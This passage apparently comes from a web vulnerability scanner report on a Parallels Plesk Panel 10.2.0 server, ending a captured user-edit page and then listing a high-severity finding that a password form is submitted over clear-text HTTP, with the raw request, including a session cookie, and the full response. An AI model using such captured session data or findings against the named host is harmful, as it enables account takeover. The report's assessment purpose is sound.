<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
